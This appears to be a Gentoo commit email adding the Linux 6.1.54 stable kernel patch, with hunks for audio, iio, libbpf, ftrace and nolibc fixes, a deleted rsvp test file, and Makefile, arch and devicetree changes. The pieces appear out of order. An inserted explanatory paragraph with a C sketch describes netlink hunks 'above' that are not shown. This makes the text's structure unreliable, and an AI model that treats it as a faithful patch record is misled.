+ 	struct snd_soc_dai *cpu_dai;
+ 	int i;
+ 
+-	if (!w->sname)
++	if (!sname)
+ 		return;
+ 
+ 	list_for_each_entry(rtd, &card->rtd_list, list) {
+ 		/* does stream match DAI link ? */
+ 		if (!rtd->dai_link->stream_name ||
+-		    strcmp(w->sname, rtd->dai_link->stream_name))
++		    strcmp(sname, rtd->dai_link->stream_name))
+ 			continue;
+ 
+ 		switch (w->id) {
+diff --git a/tools/iio/iio_generic_buffer.c b/tools/iio/iio_generic_buffer.c
+index f8deae4e26a15..44bbf80f0cfdd 100644
+--- a/tools/iio/iio_generic_buffer.c
++++ b/tools/iio/iio_generic_buffer.c
+@@ -51,9 +51,9 @@ enum autochan {
+  * Has the side effect of filling the channels[i].location values used
+  * in processing the buffer output.
+  **/
+-static int size_from_channelarray(struct iio_channel_info *channels, int num_channels)
++static unsigned int size_from_channelarray(struct iio_channel_info *channels, int num_channels)
+ {
+-	int bytes = 0;
++	unsigned int bytes = 0;
+ 	int i = 0;
+ 
+ 	while (i < num_channels) {
+@@ -348,7 +348,7 @@ int main(int argc, char **argv)
+ 	ssize_t read_size;
+ 	int dev_num = -1, trig_num = -1;
+ 	char *buffer_access = NULL;
+-	int scan_size;
++	unsigned int scan_size;
+ 	int noevents = 0;
+ 	int notrigger = 0;
+ 	char *dummy;
+@@ -674,7 +674,16 @@ int main(int argc, char **argv)
+ 	}
+ 
+ 	scan_size = size_from_channelarray(channels, num_channels);
+-	data = malloc(scan_size * buf_len);
++
++	size_t total_buf_len = scan_size * buf_len;
++
++	if (scan_size > 0 && total_buf_len / scan_size != buf_len) {
++		ret = -EFAULT;
++		perror("Integer overflow happened when calculate scan_size * buf_len");
++		goto error;
++	}
++
++	data = malloc(total_buf_len);
+ 	if (!data) {
+ 		ret = -ENOMEM;
+ 		goto error;
+diff --git a/tools/lib/bpf/libbpf.c b/tools/lib/bpf/libbpf.c
+index eeb2693128d8a..10f15a3e3a95e 100644
+--- a/tools/lib/bpf/libbpf.c
++++ b/tools/lib/bpf/libbpf.c
+@@ -8173,6 +8173,7 @@ void bpf_object__close(struct bpf_object *obj)
+ 	bpf_object__elf_finish(obj);
+ 	bpf_object_unload(obj);
+ 	btf__free(obj->btf);
++	btf__free(obj->btf_vmlinux);
+ 	btf_ext__free(obj->btf_ext);
+ 
+ 	for (i = 0; i < obj->nr_maps; i++)
+diff --git a/tools/testing/selftests/ftrace/ftracetest b/tools/testing/selftests/ftrace/ftracetest
+index c3311c8c40890..ef0edb7a71e37 100755
+--- a/tools/testing/selftests/ftrace/ftracetest
++++ b/tools/testing/selftests/ftrace/ftracetest
+@@ -30,6 +30,9 @@ err_ret=1
+ # kselftest skip code is 4
+ err_skip=4
+ 
++# umount required
++UMOUNT_DIR=""
++
+ # cgroup RT scheduling prevents chrt commands from succeeding, which
+ # induces failures in test wakeup tests.  Disable for the duration of
+ # the tests.
+@@ -44,6 +47,9 @@ setup() {
+ 
+ cleanup() {
+   echo $sched_rt_runtime_orig > $sched_rt_runtime
++  if [ -n "${UMOUNT_DIR}" ]; then
++    umount ${UMOUNT_DIR} ||:
++  fi
+ }
+ 
+ errexit() { # message
+@@ -155,11 +161,13 @@ if [ -z "$TRACING_DIR" ]; then
+ 	    mount -t tracefs nodev /sys/kernel/tracing ||
+ 	      errexit "Failed to mount /sys/kernel/tracing"
+ 	    TRACING_DIR="/sys/kernel/tracing"
++	    UMOUNT_DIR=${TRACING_DIR}
+ 	# If debugfs exists, then so does /sys/kernel/debug
+ 	elif [ -d "/sys/kernel/debug" ]; then
+ 	    mount -t debugfs nodev /sys/kernel/debug ||
+ 	      errexit "Failed to mount /sys/kernel/debug"
+ 	    TRACING_DIR="/sys/kernel/debug/tracing"
++	    UMOUNT_DIR=${TRACING_DIR}
+ 	else
+ 	    err_ret=$err_skip
+ 	    errexit "debugfs and tracefs are not configured in this kernel"
+diff --git a/tools/testing/selftests/nolibc/nolibc-test.c b/tools/testing/selftests/nolibc/nolibc-test.c
+index 78bced95ac630..f8e8e8d2a5e18 100644
+--- a/tools/testing/selftests/nolibc/nolibc-test.c
++++ b/tools/testing/selftests/nolibc/nolibc-test.c
+@@ -630,6 +630,35 @@ static struct test test_names[] = {
+ 	{ 0 }
+ };
+ 
++int is_setting_valid(char *test)
++{
++	int idx, len, test_len, valid = 0;
++	char delimiter;
++
++	if (!test)
++		return valid;
++
++	test_len = strlen(test);
++
++	for (idx = 0; test_names[idx].name; idx++) {
++		len = strlen(test_names[idx].name);
++		if (test_len < len)
++			continue;
++
++		if (strncmp(test, test_names[idx].name, len) != 0)
++			continue;
++
++		delimiter = test[len];
++		if (delimiter != ':' && delimiter != ',' && delimiter != '\0')
++			continue;
++
++		valid = 1;
++		break;
++	}
++
++	return valid;
++}
++
+ int main(int argc, char **argv, char **envp)
+ {
+ 	int min = 0;
+@@ -655,10 +684,10 @@ int main(int argc, char **argv, char **envp)
+ 	 *    syscall:5-15[:.*],stdlib:8-10
+ 	 */
+ 	test = argv[1];
+-	if (!test)
++	if (!is_setting_valid(test))
+ 		test = getenv("NOLIBC_TEST");
+ 
+-	if (test) {
++	if (is_setting_valid(test)) {
+ 		char *comma, *colon, *dash, *value;
+ 
+ 		do {
+diff --git a/tools/testing/selftests/tc-testing/tc-tests/filters/rsvp.json b/tools/testing/selftests/tc-testing/tc-tests/filters/rsvp.json
+deleted file mode 100644
+index bdcbaa4c5663d..0000000000000
+--- a/tools/testing/selftests/tc-testing/tc-tests/filters/rsvp.json
++++ /dev/null
+@@ -1,203 +0,0 @@
+-[
+-    {
+-        "id": "2141",
+-        "name": "Add rsvp filter with tcp proto and specific IP address",
+-        "category": [
+-            "filter",
+-            "rsvp"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: protocol ip prio 1 rsvp ipproto tcp session 198.168.10.64",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter show dev $DEV1 parent ffff:",
+-        "matchPattern": "^filter protocol ip pref [0-9]+ rsvp chain [0-9]+ fh 0x.*session 198.168.10.64 ipproto tcp",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "5267",
+-        "name": "Add rsvp filter with udp proto and specific IP address",
+-        "category": [
+-            "filter",
+-            "rsvp"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: protocol ip prio 1 rsvp ipproto udp session 1.1.1.1",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter show dev $DEV1 parent ffff:",
+-        "matchPattern": "^filter protocol ip pref [0-9]+ rsvp chain [0-9]+ fh 0x.*session 1.1.1.1 ipproto udp",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "2819",
+-        "name": "Add rsvp filter with src ip and src port",
+-        "category": [
+-            "filter",
+-            "rsvp"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: protocol ip prio 1 rsvp ipproto udp session 1.1.1.1 sender 2.2.2.2/5021 classid 1:1",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter show dev $DEV1 parent ffff:",
+-        "matchPattern": "^filter protocol ip pref [0-9]+ rsvp chain [0-9]+ fh 0x.*flowid 1:1 session 1.1.1.1 ipproto udp sender  2.2.2.2/5021",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "c967",
+-        "name": "Add rsvp filter with tunnelid and continue action",
+-        "category": [
+-            "filter",
+-            "rsvp"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: protocol ip prio 1 rsvp ipproto udp session 1.1.1.1 tunnelid 2 classid 1:1 action continue",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter show dev $DEV1 parent ffff:",
+-        "matchPattern": "^filter protocol ip pref [0-9]+ rsvp chain [0-9]+ fh 0x.*flowid 1:1 session 1.1.1.1 ipproto udp tunnelid 2.*action order [0-9]+: gact action continue",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "5463",
+-        "name": "Add rsvp filter with tunnel and pipe action",
+-        "category": [
+-            "filter",
+-            "rsvp"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: protocol ip prio 1 rsvp ipproto udp session 1.1.1.1 tunnel 2 skip 1 action pipe",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter show dev $DEV1 parent ffff:",
+-        "matchPattern": "^filter protocol ip pref [0-9]+ rsvp chain [0-9]+ fh 0x.*tunnel 2 skip 1 session 1.1.1.1 ipproto udp.*action order [0-9]+: gact action pipe",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "2332",
+-        "name": "Add rsvp filter with miltiple actions",
+-        "category": [
+-            "filter",
+-            "rsvp"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: protocol ip prio 7 rsvp ipproto udp session 1.1.1.1 classid 1:1 action skbedit mark 7 pipe action gact drop",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter show dev $DEV1 parent ffff:",
+-        "matchPattern": "^filter protocol ip pref [0-9]+ rsvp chain [0-9]+ fh 0x.*flowid 1:1 session 1.1.1.1 ipproto udp.*action order [0-9]+: skbedit  mark 7 pipe.*action order [0-9]+: gact action drop",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "8879",
+-        "name": "Add rsvp filter with tunnel and skp flag",
+-        "category": [
+-            "filter",
+-            "rsvp"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: protocol ip prio 1 rsvp ipproto udp session 1.1.1.1 tunnel 2 skip 1 action pipe",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter show dev $DEV1 parent ffff:",
+-        "matchPattern": "^filter protocol ip pref [0-9]+ rsvp chain [0-9]+ fh 0x.*tunnel 2 skip 1 session 1.1.1.1 ipproto udp.*action order [0-9]+: gact action pipe",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "8261",
+-        "name": "List rsvp filters",
+-        "category": [
+-            "filter",
+-            "rsvp"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress",
+-            "$TC filter add dev $DEV1 parent ffff: protocol ip prio 1 rsvp ipproto udp session 1.1.1.1/1234 classid 1:1",
+-            "$TC filter add dev $DEV1 parent ffff: protocol ip prio 1 rsvp ipproto tcp session 2.2.2.2/1234 classid 2:1"
+-        ],
+-        "cmdUnderTest": "$TC filter show dev $DEV1 parent ffff:",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter show dev $DEV1 parent ffff:",
+-        "matchPattern": "^filter protocol ip pref [0-9]+ rsvp chain [0-9]+ fh",
+-        "matchCount": "2",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "8989",
+-        "name": "Delete rsvp filter",
+-        "category": [
+-            "filter",
+-            "rsvp"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress",
+-            "$TC filter add dev $DEV1 parent ffff: protocol ip prio 1 rsvp ipproto udp session 1.1.1.1/1234 tunnelid 9 classid 2:1"
+-        ],
+-        "cmdUnderTest": "$TC filter del dev $DEV1 parent ffff: protocol ip prio 1 rsvp ipproto udp session 1.1.1.1/1234 tunnelid 9 classid 2:1",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter show dev $DEV1 parent ffff:",
+-        "matchPattern": "filter protocol ip pref [0-9]+ rsvp chain [0-9]+ fh 0x.*flowid 2:1 session 1.1.1.1/1234 ipproto udp tunnelid 9",
+-        "matchCount": "0",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    }
+-]
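
The largest set of hunks above (net/netlink/) replaces flag *masks* (NETLINK_F_* defined as 0x1, 0x2, ...) on a u32 with flag *bit numbers* on an unsigned long, tested and updated through the kernel's atomic bit helpers, so concurrent setsockopt() callers no longer race on a plain read-modify-write of the flags word. A minimal userspace sketch of that pattern, assuming C11 atomics; test_bit() and assign_bit() below are simplified stand-ins for the kernel helpers of the same names, not the real implementations:

	/* Sketch of the mask-to-bit-number conversion used in the
	 * netlink hunks: enum bit numbers + atomic bit operations
	 * instead of #define'd masks on a plain integer.
	 */
	#include <stdatomic.h>
	#include <stdio.h>

	enum { F_RECV_PKTINFO, F_BROADCAST_SEND_ERROR, F_CAP_ACK };

	static _Atomic unsigned long flags;	/* zero-initialized */

	static int test_bit(int nr, _Atomic unsigned long *p)
	{
		return (atomic_load(p) >> nr) & 1UL;
	}

	static void assign_bit(int nr, _Atomic unsigned long *p, int val)
	{
		if (val)
			atomic_fetch_or(p, 1UL << nr);	/* set_bit()  */
		else
			atomic_fetch_and(p, ~(1UL << nr));	/* clear_bit() */
	}

	int main(void)
	{
		assign_bit(F_CAP_ACK, &flags, 1);	/* like NETLINK_CAP_ACK on  */
		assign_bit(F_RECV_PKTINFO, &flags, 0);	/* like NETLINK_PKTINFO off */
		printf("CAP_ACK=%d PKTINFO=%d\n",
		       test_bit(F_CAP_ACK, &flags),
		       test_bit(F_RECV_PKTINFO, &flags));
		return 0;
	}

Each setsockopt case in the patch then collapses to picking a bit number (nr) and calling assign_bit(nr, &nlk->flags, val), which is why most of the per-option if/else blocks disappear in the diff.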


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-09-19 13:20 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-09-19 13:20 UTC (permalink / raw
  To: gentoo-commits

commit:     9a50b678865dec6622e41a9481b900772b15b8a2
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Tue Sep 19 13:19:57 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Tue Sep 19 13:19:57 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=9a50b678

Linux patch 6.1.54

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1053_linux-6.1.54.patch | 9258 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 9262 insertions(+)

diff --git a/0000_README b/0000_README
index e0a65c77..e831e898 100644
--- a/0000_README
+++ b/0000_README
@@ -255,6 +255,10 @@ Patch:  1052_linux-6.1.53.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.53
 
+Patch:  1053_linux-6.1.54.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.54
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1053_linux-6.1.54.patch b/1053_linux-6.1.54.patch
new file mode 100644
index 00000000..7f7a5319
--- /dev/null
+++ b/1053_linux-6.1.54.patch
@@ -0,0 +1,9258 @@
+diff --git a/Documentation/admin-guide/cgroup-v1/memory.rst b/Documentation/admin-guide/cgroup-v1/memory.rst
+index 2524061836acc..34911ce5e4b50 100644
+--- a/Documentation/admin-guide/cgroup-v1/memory.rst
++++ b/Documentation/admin-guide/cgroup-v1/memory.rst
+@@ -91,8 +91,6 @@ Brief summary of control files.
+  memory.oom_control		     set/show oom controls.
+  memory.numa_stat		     show the number of memory usage per numa
+ 				     node
+- memory.kmem.limit_in_bytes          This knob is deprecated and writing to
+-                                     it will return -ENOTSUPP.
+  memory.kmem.usage_in_bytes          show current kernel memory allocation
+  memory.kmem.failcnt                 show the number of kernel memory usage
+ 				     hits limits
+diff --git a/Documentation/devicetree/bindings/clock/xlnx,versal-clk.yaml b/Documentation/devicetree/bindings/clock/xlnx,versal-clk.yaml
+index 229af98b1d305..7cd88bc3a67d7 100644
+--- a/Documentation/devicetree/bindings/clock/xlnx,versal-clk.yaml
++++ b/Documentation/devicetree/bindings/clock/xlnx,versal-clk.yaml
+@@ -16,8 +16,6 @@ description: |
+   reads required input clock frequencies from the devicetree and acts as clock
+   provider for all clock consumers of PS clocks.
+ 
+-select: false
+-
+ properties:
+   compatible:
+     const: xlnx,versal-clk
+diff --git a/Documentation/mm/multigen_lru.rst b/Documentation/mm/multigen_lru.rst
+index d7062c6a89464..d8f721f98868a 100644
+--- a/Documentation/mm/multigen_lru.rst
++++ b/Documentation/mm/multigen_lru.rst
+@@ -89,15 +89,15 @@ variables are monotonically increasing.
+ 
+ Generation numbers are truncated into ``order_base_2(MAX_NR_GENS+1)``
+ bits in order to fit into the gen counter in ``folio->flags``. Each
+-truncated generation number is an index to ``lrugen->lists[]``. The
++truncated generation number is an index to ``lrugen->folios[]``. The
+ sliding window technique is used to track at least ``MIN_NR_GENS`` and
+ at most ``MAX_NR_GENS`` generations. The gen counter stores a value
+ within ``[1, MAX_NR_GENS]`` while a page is on one of
+-``lrugen->lists[]``; otherwise it stores zero.
++``lrugen->folios[]``; otherwise it stores zero.
+ 
+ Each generation is divided into multiple tiers. A page accessed ``N``
+ times through file descriptors is in tier ``order_base_2(N)``. Unlike
+-generations, tiers do not have dedicated ``lrugen->lists[]``. In
++generations, tiers do not have dedicated ``lrugen->folios[]``. In
+ contrast to moving across generations, which requires the LRU lock,
+ moving across tiers only involves atomic operations on
+ ``folio->flags`` and therefore has a negligible cost. A feedback loop
+@@ -127,7 +127,7 @@ page mapped by this PTE to ``(max_seq%MAX_NR_GENS)+1``.
+ Eviction
+ --------
+ The eviction consumes old generations. Given an ``lruvec``, it
+-increments ``min_seq`` when ``lrugen->lists[]`` indexed by
++increments ``min_seq`` when ``lrugen->folios[]`` indexed by
+ ``min_seq%MAX_NR_GENS`` becomes empty. To select a type and a tier to
+ evict from, it first compares ``min_seq[]`` to select the older type.
+ If both types are equally old, it selects the one whose first tier has
+diff --git a/Makefile b/Makefile
+index 35fc0d62898dc..844afa653fdda 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 53
++SUBLEVEL = 54
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+@@ -1939,7 +1939,9 @@ quiet_cmd_depmod = DEPMOD  $(MODLIB)
+ 
+ modules_install:
+ 	$(Q)$(MAKE) -f $(srctree)/scripts/Makefile.modinst
++ifndef modules_sign_only
+ 	$(call cmd,depmod)
++endif
+ 
+ else # CONFIG_MODULES
+ 
+diff --git a/arch/arc/include/asm/atomic-llsc.h b/arch/arc/include/asm/atomic-llsc.h
+index 1b0ffaeee16d0..5258cb81a16b4 100644
+--- a/arch/arc/include/asm/atomic-llsc.h
++++ b/arch/arc/include/asm/atomic-llsc.h
+@@ -18,7 +18,7 @@ static inline void arch_atomic_##op(int i, atomic_t *v)			\
+ 	: [val]	"=&r"	(val) /* Early clobber to prevent reg reuse */	\
+ 	: [ctr]	"r"	(&v->counter), /* Not "m": llock only supports reg direct addr mode */	\
+ 	  [i]	"ir"	(i)						\
+-	: "cc");							\
++	: "cc", "memory");						\
+ }									\
+ 
+ #define ATOMIC_OP_RETURN(op, asm_op)				\
+@@ -34,7 +34,7 @@ static inline int arch_atomic_##op##_return_relaxed(int i, atomic_t *v)	\
+ 	: [val]	"=&r"	(val)						\
+ 	: [ctr]	"r"	(&v->counter),					\
+ 	  [i]	"ir"	(i)						\
+-	: "cc");							\
++	: "cc", "memory");						\
+ 									\
+ 	return val;							\
+ }
+@@ -56,7 +56,7 @@ static inline int arch_atomic_fetch_##op##_relaxed(int i, atomic_t *v)	\
+ 	  [orig] "=&r" (orig)						\
+ 	: [ctr]	"r"	(&v->counter),					\
+ 	  [i]	"ir"	(i)						\
+-	: "cc");							\
++	: "cc", "memory");						\
+ 									\
+ 	return orig;							\
+ }
+diff --git a/arch/arc/include/asm/atomic64-arcv2.h b/arch/arc/include/asm/atomic64-arcv2.h
+index c5a8010fdc97d..9089f34baac3b 100644
+--- a/arch/arc/include/asm/atomic64-arcv2.h
++++ b/arch/arc/include/asm/atomic64-arcv2.h
+@@ -60,7 +60,7 @@ static inline void arch_atomic64_##op(s64 a, atomic64_t *v)		\
+ 	"	bnz     1b		\n"				\
+ 	: "=&r"(val)							\
+ 	: "r"(&v->counter), "ir"(a)					\
+-	: "cc");							\
++	: "cc", "memory");						\
+ }									\
+ 
+ #define ATOMIC64_OP_RETURN(op, op1, op2)		        	\
+@@ -77,7 +77,7 @@ static inline s64 arch_atomic64_##op##_return_relaxed(s64 a, atomic64_t *v)	\
+ 	"	bnz     1b		\n"				\
+ 	: [val] "=&r"(val)						\
+ 	: "r"(&v->counter), "ir"(a)					\
+-	: "cc");	/* memory clobber comes from smp_mb() */	\
++	: "cc", "memory");						\
+ 									\
+ 	return val;							\
+ }
+@@ -99,7 +99,7 @@ static inline s64 arch_atomic64_fetch_##op##_relaxed(s64 a, atomic64_t *v)	\
+ 	"	bnz     1b		\n"				\
+ 	: "=&r"(orig), "=&r"(val)					\
+ 	: "r"(&v->counter), "ir"(a)					\
+-	: "cc");	/* memory clobber comes from smp_mb() */	\
++	: "cc", "memory");						\
+ 									\
+ 	return orig;							\
+ }
+diff --git a/arch/arm64/boot/dts/renesas/rzg2l-smarc-som.dtsi b/arch/arm64/boot/dts/renesas/rzg2l-smarc-som.dtsi
+index c4faff0923800..fee53c25fc808 100644
+--- a/arch/arm64/boot/dts/renesas/rzg2l-smarc-som.dtsi
++++ b/arch/arm64/boot/dts/renesas/rzg2l-smarc-som.dtsi
+@@ -100,7 +100,7 @@
+ 		rxc-skew-psec = <2400>;
+ 		txc-skew-psec = <2400>;
+ 		rxdv-skew-psec = <0>;
+-		txdv-skew-psec = <0>;
++		txen-skew-psec = <0>;
+ 		rxd0-skew-psec = <0>;
+ 		rxd1-skew-psec = <0>;
+ 		rxd2-skew-psec = <0>;
+@@ -128,7 +128,7 @@
+ 		rxc-skew-psec = <2400>;
+ 		txc-skew-psec = <2400>;
+ 		rxdv-skew-psec = <0>;
+-		txdv-skew-psec = <0>;
++		txen-skew-psec = <0>;
+ 		rxd0-skew-psec = <0>;
+ 		rxd1-skew-psec = <0>;
+ 		rxd2-skew-psec = <0>;
+diff --git a/arch/arm64/boot/dts/renesas/rzg2lc-smarc-som.dtsi b/arch/arm64/boot/dts/renesas/rzg2lc-smarc-som.dtsi
+index 78e6e2376b015..5ff66aa6f8ba4 100644
+--- a/arch/arm64/boot/dts/renesas/rzg2lc-smarc-som.dtsi
++++ b/arch/arm64/boot/dts/renesas/rzg2lc-smarc-som.dtsi
+@@ -77,7 +77,7 @@
+ 		rxc-skew-psec = <2400>;
+ 		txc-skew-psec = <2400>;
+ 		rxdv-skew-psec = <0>;
+-		txdv-skew-psec = <0>;
++		txen-skew-psec = <0>;
+ 		rxd0-skew-psec = <0>;
+ 		rxd1-skew-psec = <0>;
+ 		rxd2-skew-psec = <0>;
+diff --git a/arch/arm64/boot/dts/renesas/rzg2ul-smarc-som.dtsi b/arch/arm64/boot/dts/renesas/rzg2ul-smarc-som.dtsi
+index 2a0feb53f0dcb..b62973bc2f0dd 100644
+--- a/arch/arm64/boot/dts/renesas/rzg2ul-smarc-som.dtsi
++++ b/arch/arm64/boot/dts/renesas/rzg2ul-smarc-som.dtsi
+@@ -80,7 +80,7 @@
+ 		rxc-skew-psec = <2400>;
+ 		txc-skew-psec = <2400>;
+ 		rxdv-skew-psec = <0>;
+-		txdv-skew-psec = <0>;
++		txen-skew-psec = <0>;
+ 		rxd0-skew-psec = <0>;
+ 		rxd1-skew-psec = <0>;
+ 		rxd2-skew-psec = <0>;
+@@ -107,7 +107,7 @@
+ 		rxc-skew-psec = <2400>;
+ 		txc-skew-psec = <2400>;
+ 		rxdv-skew-psec = <0>;
+-		txdv-skew-psec = <0>;
++		txen-skew-psec = <0>;
+ 		rxd0-skew-psec = <0>;
+ 		rxd1-skew-psec = <0>;
+ 		rxd2-skew-psec = <0>;
+diff --git a/arch/arm64/net/bpf_jit_comp.c b/arch/arm64/net/bpf_jit_comp.c
+index 14134fd34ff79..0ce5f13eabb1b 100644
+--- a/arch/arm64/net/bpf_jit_comp.c
++++ b/arch/arm64/net/bpf_jit_comp.c
+@@ -1655,13 +1655,8 @@ static void invoke_bpf_prog(struct jit_ctx *ctx, struct bpf_tramp_link *l,
+ 	struct bpf_prog *p = l->link.prog;
+ 	int cookie_off = offsetof(struct bpf_tramp_run_ctx, bpf_cookie);
+ 
+-	if (p->aux->sleepable) {
+-		enter_prog = (u64)__bpf_prog_enter_sleepable;
+-		exit_prog = (u64)__bpf_prog_exit_sleepable;
+-	} else {
+-		enter_prog = (u64)__bpf_prog_enter;
+-		exit_prog = (u64)__bpf_prog_exit;
+-	}
++	enter_prog = (u64)bpf_trampoline_enter(p);
++	exit_prog = (u64)bpf_trampoline_exit(p);
+ 
+ 	if (l->cookie == 0) {
+ 		/* if cookie is zero, one instruction is enough to store it */
+diff --git a/arch/mips/Makefile b/arch/mips/Makefile
+index fe64ad43ba882..ee8f47aef98b3 100644
+--- a/arch/mips/Makefile
++++ b/arch/mips/Makefile
+@@ -308,8 +308,8 @@ ifdef CONFIG_64BIT
+     endif
+   endif
+ 
+-  ifeq ($(KBUILD_SYM32)$(call cc-option-yn,-msym32), yy)
+-    cflags-y += -msym32 -DKBUILD_64BIT_SYM32
++  ifeq ($(KBUILD_SYM32), y)
++    cflags-$(KBUILD_SYM32) += -msym32 -DKBUILD_64BIT_SYM32
+   else
+     ifeq ($(CONFIG_CPU_DADDI_WORKAROUNDS), y)
+       $(error CONFIG_CPU_DADDI_WORKAROUNDS unsupported without -msym32)
+@@ -350,7 +350,7 @@ KBUILD_CFLAGS += -fno-asynchronous-unwind-tables
+ 
+ KBUILD_LDFLAGS		+= -m $(ld-emul)
+ 
+-ifdef CONFIG_MIPS
++ifdef need-compiler
+ CHECKFLAGS += $(shell $(CC) $(KBUILD_CFLAGS) -dM -E -x c /dev/null | \
+ 	egrep -vw '__GNUC_(MINOR_|PATCHLEVEL_)?_' | \
+ 	sed -e "s/^\#define /-D'/" -e "s/ /'='/" -e "s/$$/'/" -e 's/\$$/&&/g')
+diff --git a/arch/parisc/include/asm/led.h b/arch/parisc/include/asm/led.h
+index 6de13d08a3886..b70b9094fb7cd 100644
+--- a/arch/parisc/include/asm/led.h
++++ b/arch/parisc/include/asm/led.h
+@@ -11,8 +11,8 @@
+ #define	LED1		0x02
+ #define	LED0		0x01		/* bottom (or furthest left) LED */
+ 
+-#define	LED_LAN_TX	LED0		/* for LAN transmit activity */
+-#define	LED_LAN_RCV	LED1		/* for LAN receive activity */
++#define	LED_LAN_RCV	LED0		/* for LAN receive activity */
++#define	LED_LAN_TX	LED1		/* for LAN transmit activity */
+ #define	LED_DISK_IO	LED2		/* for disk activity */
+ #define	LED_HEARTBEAT	LED3		/* heartbeat */
+ 
+diff --git a/arch/sh/boards/mach-ap325rxa/setup.c b/arch/sh/boards/mach-ap325rxa/setup.c
+index c77b5f00a66a3..d8f8dca4d7968 100644
+--- a/arch/sh/boards/mach-ap325rxa/setup.c
++++ b/arch/sh/boards/mach-ap325rxa/setup.c
+@@ -530,7 +530,7 @@ static int __init ap325rxa_devices_setup(void)
+ 	device_initialize(&ap325rxa_ceu_device.dev);
+ 	dma_declare_coherent_memory(&ap325rxa_ceu_device.dev,
+ 			ceu_dma_membase, ceu_dma_membase,
+-			ceu_dma_membase + CEU_BUFFER_MEMORY_SIZE - 1);
++			CEU_BUFFER_MEMORY_SIZE);
+ 
+ 	platform_device_add(&ap325rxa_ceu_device);
+ 
+diff --git a/arch/sh/boards/mach-ecovec24/setup.c b/arch/sh/boards/mach-ecovec24/setup.c
+index 674da7ebd8b7f..7ec03d4a4edf0 100644
+--- a/arch/sh/boards/mach-ecovec24/setup.c
++++ b/arch/sh/boards/mach-ecovec24/setup.c
+@@ -1454,15 +1454,13 @@ static int __init arch_setup(void)
+ 	device_initialize(&ecovec_ceu_devices[0]->dev);
+ 	dma_declare_coherent_memory(&ecovec_ceu_devices[0]->dev,
+ 				    ceu0_dma_membase, ceu0_dma_membase,
+-				    ceu0_dma_membase +
+-				    CEU_BUFFER_MEMORY_SIZE - 1);
++				    CEU_BUFFER_MEMORY_SIZE);
